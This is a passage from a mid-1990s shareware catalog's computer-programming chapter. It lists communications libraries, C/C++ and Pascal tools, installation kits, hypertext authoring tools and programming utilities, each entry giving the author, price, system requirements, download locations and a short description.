$40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; royalty-free source code; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware. + Look for: PPL4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLC10.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PPL4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11782 + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + A protocol library supporting ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports most C compilers incluidng Turbo C, Borland + C, Microsoft C, and MIX Power C. + + Chapter 12, "Computer programming" 402 + + + + Product: Power C Shell + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 2.5 (01-09-95) + Needs: IBM PC, DOS 2.11 or better. 256k RAM. Power C compiler + from MIX Software. + Strongly recommended: Hard disk. + Registration fee: $19.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: PCSHEL??.ZIP on BBSs; PCSHEL.ZIP on CompuServe in + CIS:PCPRO forum LIBrary 3 (or contact userID 72330,1776 for + assistance). + SWREG#: 1180 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Provides a programming environment shell for Power C from MIX + Software. Customizable with your own editor and viewer, it + makes the editing/compiling/debugging/testing process a snap. + Customizable colors and compile/link options. Features pull- + down menus, environment variables, library management, and + project support. Context-sensitive help, shell-to-DOS option. + Access Power C Trace interactive debugging utility from IDE. + Bundled by Mix Software with the Power C compiler. + + + Product: ShareMan + Software distribution tool. See full description on page 639. + + Product: The Window BOSS & Data Clerk + Author: Star Guidance Consulting, Inc. (Philip A. Mongelluzzo), + 203-574-2449 + Version: 8.02 (08-15-94) + Needs: IBM PC, DOS 2.1 or better. CGA monitor; Hercules monitor; + Hard disk. "C" Compiler (Microsoft, Borland, Watcom). + Strongly recommended: Mouse; CD-ROM drive. + Registration fee: $55.00 (add $6.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, GEnie support; royalty-free source code; + royalty-free runtime license; discounts on upgrades. 2-month + free upgrading allowed. + Look for: BOZZ.ZIP on BBSs (multiple files); BOSS.ZIP on + CompuServe in CIS:PCPROG forum LIBrary 3 (multiple files) (or + contact userID 71565,1001 for assistance); BOSS.ZIP on GEnie in + + Chapter 12, "Computer programming" 403 + + + + IBMPC forum LIBrary 9 (multiple files) (or contact userID + MONGELLUZZO for assistance). + SWREG#: 3667 + PsL#: 10171 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Comprehensive set of windowing, data entry, and mouse + manipulation functions for the "C" language. Pop-up windows, + pull down menus, CUA(s), status lines, and the like can be + easily implemented. Makes it a snap to enter text, integers, + floats, longs, dates, phone numbers, and times. Complex forms + with individual field validation checks, help and error + messages are a snap. The programmer interface is clean, + uncluttered, and easy to remember. Generated code is fast and + small! + + + 12.3.3.1 C++ + + Product: CodePrint for C/C++ + Author: Geist Microsystems (Tim Kertis), 317-823-1384 + Version: 2.02 (01-01-96) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $49.00 (add $3.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, BBS, CompuServe, + mail support; 6-month limited return policy; all ASP-wide + offers (see page 6). 6-month free upgrading allowed. + Look for: availability unknown on BBSs; CPC.ZIP on CompuServe in + CIS:BORFORUMS forum LIBrary 11 (or contact userID 70404,3246 + for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A full-featured command-line driven source code formatter and + pretty printer for the C and C++ programming languages. As a + source code formatter, CodePrint can quickly standardize the + look of your source code. As a pretty printer, Can enhance the + readability of your source code listings. The use of DOS + environment variables to set options and batch processing make + this program easy to use. + + + Product: EZinst + Windows installation. See full description on page 412. + + Product: The MetaKit Library [***] + C++ classes for persistent structured data. See full + description on page 386. + + Chapter 12, "Computer programming" 404 + + + + Product: Playground + Tool for building object models. See full description on + page 384. + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 180. + + Product: Wndlib + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (03-25-94) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus data; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: WNDLIB10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); WNDLI*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 10 (or contact userID 71532,3271 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + A set of C++ class libraries to aid Windows programming. + + + 12.3.4 Pascal + + Product: Personal Com Lib for PowerBASIC + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.3 (04-25-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6). + Look for: PCL4PB43.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCL4PB.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 4; PCL4PB43.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting PoerBASIC. + Supports COM1 to COM16, 300 to 115200 baud, 4 ports + concurrently, complete line/modem status & control, interrupt + driven, 8250/16450/16550, RTS/CTS flow control, Digiboard PC/4 + & PC/8, and BOCA BB2016. Includes terminal program with XMODEM + & YMODEM. + + Chapter 12, "Computer programming" 405 + + + + Product: Personal Comm Lib for Pascal + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.3 (04-25-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PCL4P43.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLP43.ZIP on CompuServe in CIS:PCPRO forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PCL4P43.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10909 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Turbo Pascal + version 4.0 and up. Supports COM1-COM16, 300 to 115200 baud, 4 + ports concurrently, complete line/modem status & control, + interrupt driven, 8250/16450/16550 UARTs, RTS/CTS flow control, + DigiBoard PC/4 & PC/8, and dumb BOCA boards. Includes terminal + program with ASCII, XMODEM, YMODEM, YMODEM-G. + + + Product: Personal Comm Lib Visual BASIC + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 4.3 (04-25-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware. + Look for: PCL4VB43.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLB43.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 4; PCL4B43.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11499 + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting Microsoft + Visual BASIC fdor DOS. Supports COM1 - COM16 at 300 to 115200 + baud, 4 ports concurrently, complete line/modem status & + control, interrupt driven, 8250,16450/16550 UARTS, RTS/CTS flow + + Chapter 12, "Computer programming" 406 + + + + control, Digiboad PC/4 & PC/8, BOCA BB2016. Includes terminal + program with XMODEM and YMODEM. + + + Product: Personal Protocol Lib 4 Pascal + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 1.0 (02-12-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Personal Communications Library for Pascal (PCL4P). + Strongly recommended: Hayes-compatible modem. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: PPL4P10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PPLP10.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 5 (or contact userID 70671,1340 for assistance); + PPL4P10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11783 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A protocol library featuring ASCII, XMODEM, YMODEM, and ZMODEM + protocols. Supports Borland Turbo Pascal 4.0 and up. + + + 12.3.4.1 OOP Pascal for DOS (Borland) + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 422. + + Chapter 12, "Computer programming" 407 + + + + 12.3.4.2 OOP Pascal for Windows (Borland) + + Product: IniCtrls + Author: Prodigy Computing + Version: 1.15 (12-16-95) + Needs: IBM PC, DOS 5.0 or better. Hard disk. Borland Delphi + 1.0. + Registration fee: $17.50 + Registration benefits: Full program functionality; 3 months of + fax, CompuServe, mail support; royalty-free runtime license; + all ASP-wide offers (see page 6). 6-month free upgrading + allowed. + Look for: availability unknown on BBSs; INICTRLS.Z on CompuServe + in CIS:DELPHI forum LIBrary 22 (or contact userID 73770,660 for + assistance). + SWREG#: 88648865 + Download size: 785k (about 58 minutes with a 2400 baud modem) + Description: + A set of .INI-aware Delphi components (like data-aware + components, but easier to use). These controls are for writing + configuration programs; the package includes edit box + (including a numeric-only variety), radio button, checkbox, + combo box, and string grid. Eliminates tedious coding of + TInifile.ReadString and WriteString calls. + + + 12.3.5 Other + + Product: Ahelp Clipper Help Library + Advanced help library for Clipper developers. See full + description on page 421. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 100. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 386. + + + 12.4 Hypertext/hypermedia + + See also: Business, Training & support aids. + + Chapter 12, "Computer programming" 408 + + + + Product: DeskTop Advisor(R) + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 2.0 (12-04-93) + Needs: IBM PC, DOS 2.1 or better. 7k RAM; CGA monitor; Hercules + monitor; Hard disk. Browser (launched via hot key) needs 512k + RAM minimum. + Strongly recommended: VGA monitor; EMS memory; XMS memory. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month return policy; + royalty-free runtime license; bonus utilities; bonus data; all + ASP-wide offers (see page 6). 1 free update disk(s) sent out. + Bonus Sound Support(tm) to enhance online help. + Look for: DTA20*.ZIP on BBSs (multiple files) (call 215-673-6915 + to download it at no charge); DTA20*.ZIP on CompuServe in + CIS:MULTIMEDIA forum LIBrary 11 (multiple files) (or contact + userID 71221,3602 for assistance). + SWREG#: 2832 + PsL#: 11407 + Download size: 678k (about 51 minutes with a 2400 baud modem) + Description: + A hyperdocument authoring & delivery system. It is an easy-to- + use tool for creating and distributing on-line documents in + hypertext form. These hyperdocuments can be electronically + browsed for learning, research, reference, or instant help + purposes. Attach images and sound (e.g., voice annotation). + Three navigational modes are supported: menu selection, keyword + query, and hyperlink. Has a TSR shell for popping up over + other applications when needed. + + + Product: Gif+Web Transparent GIF Editor + Transparent GIF Editor. See full description on page 482. + + Product: WebParse + Mailto web form data parsing and conversion. See full + description on page 360. + + Product: WebPen + Author: Informatik Inc., 610.640.0339 + Version: 1.10 (12-28-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 12, "Computer programming" 409 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; WEBPEN.ZIP on CompuServe + in CIS:INETRES forum LIBrary 9 (or contact userID 76534,1166 + for assistance). + SWREG#: 7147 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + HTML Editor. This easy to use HTML editor simplifies the + creation of 'every day' home pages. Special functions for + colored bullets, e-mail, copyright, etc. + + + 12.5 Tutorials + + See also: Education, Computers. + + Product: Basic Training + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.01 (10-07-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. Bonus + source code. + Look for: availability unknown on BBSs; BT.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 4 (or contact userID 76703,3046 for + assistance). + SWREG#: 380 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This tutorial introduces the elements of BASIC including simple + controls, looping, color & sound, arrays & DATA, GOSUBs and + functions, files, simple graphics. Interactive tutorial comes + complete with numerous examples you can run and modify. When + you've mastered this, you're ready for advanced BASIC. Topics + include animation techniques, shape shifting techniques, error + handling, chaining, windows, peek/poke, bload/bsave, plus, + details on diff + + Chapter 12, "Computer programming" 410 + + + + Product: The DemoMaker + Author: Ron Janorkar, 212-334-1243 + Version: 1.55 (04-02-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; site license; all ASP-wide offers (see page 6); disks + of other shareware. Lifetime free upgrading allowed. + Look for: DMAKE155.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A powerful software tool that creates presentation demos of any + DOS based program. It allows software authors to create live + color demonstrations of their products, to show the various + capabilities of their programs, in the form of compact self + running presentations. Sysops can use it to create slide shows + of their systems to graphically demonstrate all the features + their BBS has to offer. Very easy to use and creates compact + EXE files. + + + 12.6 Software installation aids + + Product: Easy Install + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 6.0 (08-17-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; EI.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 100410,717 for + assistance). + SWREG#: 3045 + PsL#: 11491 + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + At the touch of a key, it will create self installing + distribution disks in compressed form. There is no need to + create separate packed files for different disk sizes - just + tell it which directory your program is in and which drive to + create the Installation disk(s) on. Your program will be packed + onto however many disks are necessary. The end user simply + types "Install" on disk one. There are options to display a + readme file and to start the installed program. + + Chapter 12, "Computer programming" 411 + + + + Product: Easy SFX + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 1.0 (08-17-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; Hard disk. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; EI.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 100410,717 for + assistance). + SWREG#: 3045 + PsL#: 11491 + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + Creates a unique self extracting file which allows the user to + choose the target drive and directory. It also displays a + readme file after extraction and optionally starts the + installed program. The parameters for each SFX file made are + stored in a data file so that remakes are simply a case of + choosing the program name from a list. Any directory sub + structure can be installed. + + + Product: EZinst + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.2 (07-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; royalty-free source code; bonus utilities; discounts + on other products; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: EZINST12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EZINS*.ZIP on CompuServe in CIS:BCPPWIN forum + LIBrary 9 (or contact userID 71532,3271 for assistance). + SWREG#: 3782 + Download size: 54k (about four minutes with a 2400 baud modem) + Description: + An installation program for Windows. It was designed for + programmers, consultants, and other users who need a program to + easily install Windows applications. On-line help. + + Chapter 12, "Computer programming" 412 + + + + Product: First Impression + Author: Lincoln Beach Software (Harold Holmes), 314-861-1500 + Version: 3.1 (06-09-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: IMPRES31.ZIP on BBSs (call 317-784-2147 to download it + at no charge); IMPRES.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 10931 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Scriptless installation toolkit for developers that covers + every aspect of an install. Full featured WYSIWYG developer + interface allows you to create that exact look you need without + writing a script! Check for h/w requirements as well as + updates CONFIG and AUTOEXEC files. Auto search will search a + drive for prev. installations and conditional checking allows + necessary actions to be performed if needed. Many hardware + verification options! + + + Product: PUT, GET, Install Utilities + Compression, archive, installation aids. See full description + on page 38. + + Product: QUIK-INSTALL + Author: Michael L. Wester, 919-552-0767 + Version: 2.0 (12-07-93) + Needs: IBM PC, DOS 2.1 or better. 184k RAM. + Registration fee: $15.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; royalty-free runtime license; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: availability unknown on BBSs; QINST2.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Create a fully functional, self contained, application install + program in less than 5 minutes! Menu driven setup (No scripts, + CFG's or programing) with mouse support & context sensitive + help. Supports multiple disks, creates directories, copies + files or unpacks EXE archives, checks disk space, executes + application after installation, 6.5k INSTALL.EXE stores setup + information internally, configure colors, prompt, messages, + adds functionality to batch files, very quick & very easy! + + Chapter 12, "Computer programming" 413 + + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 33. + + Product: SETUP.EXE - Free 19k Bootstrap + Author: Chapter One Developments Ltd. (Mike Chapman), + (44)-0-973-222937 + Version: 4.6 (08-12-95) + Needs: IBM AT (80286), Windows 3.0 or better. Windows + development system such as Visual Basic or Delphi. + Registration fee: $10.00 + Registration benefits: lifetime unlimited fax, CompuServe, mail + support; lifetime return policy; royalty-free source code; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; ASETUP.ZIP on CompuServe + in CIS:MSBASIC forum LIBrary 9 (or contact userID 100030,351 + for assistance). + SWREG#: 5171 + PsL#: 14067 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Free 18k bootstrapper program. Features include full dialog box + customisation and enhanced error messages (optional 3d look), + Windows file version checking, setup log, optional temporary + directory use, ability to localise all text, and more - over 22 + configuration settings! Originally for Visual Basic (as an + advanced alternative to the SETUP.EXE supplied with that + product) but can be used with any Windows development system. + Includes Windows help. + + + Product: Universal Install + Author: The GoodSoft Co., 303-444-5747 + Version: 2.0 (05-10-94) + Needs: IBM PC, DOS 3.0 or better. 250k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $39.95 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; royalty-free runtime license; bonus utilities; + + Chapter 12, "Computer programming" 414 + + + + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: UNST20.ZIP on BBSs (call 303-XXX-XXXX to download it at + no charge); UNST20.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 72073,225 for assistance). + SWREG#: 907 + PsL#: 11020 + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + A professional software installation development kit featuring + built-in file compression (save up to 50% space), a text file + view feature with print and search functions, self-contained + INSTALL.EXE generation, features to make modifications to any + file (even WIN.INI) and create batch files to run your + software. The end result can look and feel like your own + software - you have complete control over all aspects of your + installation. + + + Product: Vending Machine + Author: Lincoln Beach Software (Harold Holmes), 314-861-1500 + Version: 1.5 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $50.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: VEND15.ZIP on BBSs (call 317-784-2147 to download it at + no charge); VEND15.ZIP on CompuServe in CIS:0 forum LIBrary 0 + (or contact userID 70700,630 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Custome installation toolkit for disk vendors that will allow + users to uncompress up to 10 files per disk into a user defined + subdirecotry. Allows for configuration encryption and file + viewing for each ZIP. + + + Product: WINstall + Author: Dovcom, 801-221-4527 + Version: 1.0a (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse; XMS + memory. + Registration fee: $39.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 12 months + of unlimited phone, CompuServe, mail support; 3-month return + policy; royalty-free runtime license; all ASP-wide offers (see + + Chapter 12, "Computer programming" 415 + + + + page 6); discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. + Look for: WINS10A.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WINS.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 22 (or contact userID 74552,1027 for assistance). + SWREG#: 3512 + PsL#: 11587 + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + A professional Windows installation utility that provides + software publishers with an easy to use, compact tool with + which they may set up their software on users' computers. Fully + automated and supports installation from multiple floppies of + any size or directly from a hard drive or CD-ROM. At only 25k + this is the smallest program of its type for the power and + flexability that it offers. Don't sacrifice disk space for a + quality install. + + + 12.7 Software testing aids + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 417. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 123. + + Product: RI-VB Database Toolkit v1.1 + Author: MIS Resources International (Wayne Edwards), + 404-594-7500 + Version: 1.1 (02-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + XMS memory; VBRUN300.DLL. + Registration fee: $30.00 (add $3.95 for shipping to U.S. + addresses) (add $7.95 for shipping to Canadian addresses) (add + $7.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 3-month limited + return policy; site license; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: RIDT11.ZIP on BBSs; RIDT11.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 4783 + Download size: 684k (about 51 minutes with a 2400 baud modem) + Description: + For use in the development of Visual Basic and MS Access + database applications. A means for executing single/multiple + SQL statements on Access database; adding, modifying, running, + exporting and importing query defs listings; generating SQL + create and insert statements from an existing Access database. + + Chapter 12, "Computer programming" 416 + + + + Output directed to screen, text file, printer or the clipboard. + Fully functional with online help. This revised version + replaces RIDT10.ZIP and allows spaces in Database or field + names. + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 33. + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 379. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 162. + + + 12.8 Programming utilities + + Product: BASASM.LIB + Assembler routine library for BASIC programs. See full + description on page 388. + + Product: c-scope + Author: JAYAR Systems, 416-751-5678 + Version: 1.11 (10-31-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $24.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, mail support; royalty-free runtime license; all ASP-wide + offers (see page 6). + Look for: CSCOP111.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Completely analyzes the interrelationships between functions in + a C program no matter how complex it is--even when many source + files are involved. It produces a Function Location report + showing the file each function is defined in; a File Contents + report naming the functions defined in each file; a Function + Reference report listing the functions each function calls; and + a Static Calling Tree report giving a visual representation of + the function calls. + + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 117. + + Chapter 12, "Computer programming" 417 + + + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 182. + + Product: CodePrint for C/C++ + C/C++ source code formatter and printer. See full description + on page 403. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 409. + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 26. + + Product: OWShare - Delphi + Shareware interface source code demo - Delphi. See full + description on page 638. + + Product: OWShare - VB + Shareware interface source code demo - VB. See full + description on page 639. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 38. + + Product: Universal Install + Software installation development kit. See full description on + page 413. + + Product: WinAlter + Alter file date, time, & attribs in Windows. See full + description on page 28. + + Product: Workbase + Dot-prompt utility for DBMS programmers. See full description + on page 235. + + 12.8.1 Desktop tools for programmers + + See also: Business, Training & support aids, "Help desk" + applications. + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 102. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 175. + + Chapter 12, "Computer programming" 418 + + + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 176. + + Product: Builder + Clipper application generator. See full description on + page 242. + + Product: Examine + Fast text search utility for Windows. See full description on + page 14. + + Product: Helpgen + Windows help file generator - authoring tool. See full + description on page 420. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 233. + + Product: RUF100.ZIP + Reuseable functions for Visual Basic. See full description on + page 397. + + Product: SLIB10.ZIP + Author: MIS Resources International (Wayne Edwards), + 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; XMS memory. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail 